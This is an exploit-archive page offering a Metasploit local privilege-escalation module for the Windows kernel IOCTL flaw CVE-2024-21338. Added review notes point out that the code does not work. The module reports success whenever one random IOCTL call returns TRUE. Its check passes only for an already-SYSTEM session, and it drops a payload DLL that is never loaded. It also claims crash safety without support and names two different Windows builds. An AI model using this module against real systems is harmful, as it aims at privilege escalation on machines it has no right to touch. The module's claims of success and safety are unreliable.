=============================================================================================================================================
| # Title     : Windows 11 Pro 23H2 Kernel IOCTL Access Control Vulnerability Exploit
| # Author    : indoushka
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)
| # Vendor    : System built-in component. No standalone download available.
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338

[+] Summary :

CVE-2024-21338 is a security vulnerability in the Microsoft Windows Kernel involving insufficient access control for IOCTL (Input/Output Control) handlers. This vulnerability allows non-privileged users to access kernel-level functionality that should be restricted, potentially leading to privilege escalation.

Technical Details:
  Vulnerability Type  : Insufficient Access Control
  Attack Vector       : Local
  Privileges Required : Low
  Impact              : Privilege Escalation
  Affected Systems    : Windows 10 (various versions), Windows 11 (various versions), Windows Server 2019/2022

Key Components:
  Vulnerable Component : Windows Kernel IOCTL handlers
  Attack Mechanism     : Direct kernel object manipulation
  Exploitation         : Through device driver interface

Exploitation Flow:
  1. Identify vulnerable IOCTL handlers
  2. Open handle to vulnerable device driver
  3. Craft malicious IOCTL requests
  4. Bypass access control checks
  5.
Execute arbitrary code in kernel context

Mitigation Strategies:
  Apply Security Updates : Install Microsoft January 2024 security patches
  Driver Whitelisting    : Implement driver signature enforcement
  Access Control         : Restrict access to device interfaces
  Monitoring             : Monitor for suspicious driver activity

Detection Indicators:
  Unusual IOCTL requests to kernel drivers
  Attempts to access privileged device interfaces
  Unexpected driver loading patterns

[+] POC :

#############################################
# Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338
# Author: indoushka
#############################################
# NOTE(review): the build named in this title (10.0.17763.5458) differs from the
# "Windows 11 Pro 23H2" named at the top of the page. Neither is verified by the
# module: `check` below matches only /windows/i on sysinfo['OS'] and /x64/ on
# sysinfo['Architecture'].
#
# NOTE(review): as written, this module is an IOCTL reachability probe rather than
# a working exploit for CVE-2024-21338. It opens DEVICE_NAME, sends IOCTL_CODE with
# a 1024-byte random input buffer, and reports "Exploitation successful!" whenever
# DeviceIoControl returns a non-zero (TRUE) result. The DLL it writes to %TEMP% is
# never referenced by trigger_exploit, DEVICE_NAME defaults to a placeholder name,
# and `check` only reaches Appears when the session is already SYSTEM.
require 'msf/core'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  # Module metadata and options.
  #
  # Options registered here:
  #   DEVICE_NAME - device path opened by device_exists? and trigger_exploit.
  #                 The single-quoted default evaluates to \\.\VulnerableDriver,
  #                 which reads as a placeholder rather than a real device name.
  #   IOCTL_CODE  - control code passed to DeviceIoControl (default 0x222003).
  #
  # Note that 'Stability' => CRASH_SAFE is asserted although the module sends
  # random bytes to an arbitrary user-supplied IOCTL code; that claim is not
  # supported by anything in this file.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
        'Description' => %q{ This module exploits an insufficient access control vulnerability in the Windows Kernel through exposed IOCTL handlers. The vulnerability allows non-privileged users to access kernel-level functionality leading to privilege escalation.
        },
        'Author' => ['indoushka'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338'],
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338']
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X64],
        'SessionTypes' => ['meterpreter'],
        'Payload' => { 'Space' => 4096, 'DisableNops' => true },
        'Targets' => [
          [ 'Windows 10/11 x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'EXITFUNC' => 'thread' },
        'DisclosureDate' => '2024-01-09',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']),
      OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003])
    ])
  end

  # Vulnerability check.
  #
  # @return [Msf::Exploit::CheckCode]
  #   Safe     - OS string does not match /windows/i, architecture does not
  #              match /x64/, or DEVICE_NAME cannot be opened.
  #   Detected - session is not SYSTEM.
  #   Appears  - session is SYSTEM and DEVICE_NAME can be opened.
  #
  # NOTE(review): the SYSTEM requirement is inverted relative to the stated goal.
  # A local privilege escalation should run from a low-privileged session, but
  # `exploit` aborts unless this method returns Appears, and Appears is only
  # reached after is_system? succeeds. Opening the device successfully also only
  # shows the device exists and is accessible; it says nothing about whether the
  # IOCTL handler is vulnerable.
  def check
    if sysinfo['OS'] !~ /windows/i
      return CheckCode::Safe('Target is not a Windows system')
    end
    if sysinfo['Architecture'] !~ /x64/
      return CheckCode::Safe('Target architecture is not supported')
    end
    unless is_system?
      return CheckCode::Detected('User does not have SYSTEM privileges')
    end
    device_path = datastore['DEVICE_NAME']
    if device_exists?(device_path)
      return CheckCode::Appears('Vulnerable device driver detected')
    else
      return CheckCode::Safe('Vulnerable device driver not found')
    end
  end

  # Exploit entry point.
  #
  # Steps, as visible here:
  #   1. Re-run `check` and abort with Failure::NotVulnerable unless it returns Appears.
  #   2. Generate the payload as a DLL, write it to %TEMP%\<8 random letters>.dll
  #      and register it for cleanup (this is the ARTIFACTS_ON_DISK side effect).
  #   3. Call trigger_exploit with that path.
  #
  # NOTE(review): trigger_exploit never uses its payload_path argument, so the
  # DLL written in step 2 is dropped on disk for nothing and is never loaded or
  # executed by this module. "Exploitation successful!" therefore only means
  # the IOCTL call returned TRUE; no session or privilege change is produced
  # or verified here.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on NotVulnerable / Unknown.
  def exploit
    print_status("Starting exploitation for CVE-2024-21338")
    unless check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end
    print_status("Generating payload...")
    payload_data = generate_payload_dll
    temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll"
    print_status("Writing payload to #{temp_path}")
    write_file(temp_path, payload_data)
    register_file_for_cleanup(temp_path)
    print_status("Triggering vulnerability via IOCTL...")
    if trigger_exploit(temp_path)
      print_good("Exploitation successful!")
    else
      fail_with(Failure::Unknown, "Exploitation failed")
    end
  end

  private

  # Tests whether device_path can be opened read-only from the current session.
  #
  # @param device_path [String] device path passed straight to CreateFileA.
  # @return [Boolean] true if CreateFileA returned something other than
  #   INVALID_HANDLE_VALUE (the handle is closed again immediately); false on
  #   INVALID_HANDLE_VALUE or on any StandardError raised by the railgun call.
  #
  # The bare `rescue` swallows every StandardError (transport errors, missing
  # railgun constants, ...) and reports them as "device not found", which makes
  # `check` return Safe for reasons unrelated to the target.
  def device_exists?(device_path)
    begin
      file = client.railgun.kernel32.CreateFileA(
        device_path,
        'GENERIC_READ',
        'FILE_SHARE_READ|FILE_SHARE_WRITE',
        nil,
        'OPEN_EXISTING',
        'FILE_ATTRIBUTE_NORMAL',
        0
      )
      if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE')
        client.railgun.kernel32.CloseHandle(file['return'])
        return true
      end
    rescue
      return false
    end
    false
  end

  # Opens DEVICE_NAME read/write and issues one DeviceIoControl with IOCTL_CODE.
  #
  # @param payload_path [String] accepted but never read — see the note on `exploit`.
  # @return [Boolean] true if DeviceIoControl returned a truthy 'return' value,
  #   false if the device could not be opened, the call returned FALSE, or a
  #   StandardError was raised.
  #
  # The input buffer is 1024 random alphabetic bytes; no output buffer is
  # supplied (lpOutBuffer nil, nOutBufferSize 0). The `4` in the lpBytesReturned
  # position presumably follows railgun's out-pointer convention (size of the
  # DWORD to write back) — confirm against the railgun DeviceIoControl
  # definition. The flag string 'GENERIC_READ | GENERIC_WRITE' contains spaces,
  # unlike the unspaced 'FILE_SHARE_READ|FILE_SHARE_WRITE' in device_exists?;
  # confirm railgun's constant parser tolerates both forms.
  #
  # From a monitoring standpoint, this pair of calls — a user-mode CreateFileA on
  # DEVICE_NAME followed by DeviceIoControl with IOCTL_CODE and a 1024-byte
  # random input — is the observable activity the page's "Detection Indicators"
  # section describes.
  def trigger_exploit(payload_path)
    begin
      device_handle = client.railgun.kernel32.CreateFileA(
        datastore['DEVICE_NAME'],
        'GENERIC_READ | GENERIC_WRITE',
        0,
        nil,
        'OPEN_EXISTING',
        0,
        0
      )
      if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE')
        print_error("Failed to open device handle")
        return false
      end
      buffer_size = 1024
      input_buffer = Rex::Text.rand_text_alpha(buffer_size)
      ioctl_result = client.railgun.kernel32.DeviceIoControl(
        device_handle['return'],
        datastore['IOCTL_CODE'],
        input_buffer,
        input_buffer.length,
        nil,
        0,
        4,
        nil
      )
      # The handle is closed before the result is inspected, so the device is
      # not held open across the print/return below.
      client.railgun.kernel32.CloseHandle(device_handle['return'])
      if ioctl_result['return']
        print_good("IOCTL sent successfully")
        return true
      else
        print_error("IOCTL failed")
        return false
      end
    rescue => e
      print_error("Exploitation error: #{e.message}")
      return false
    end
  end
end

Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================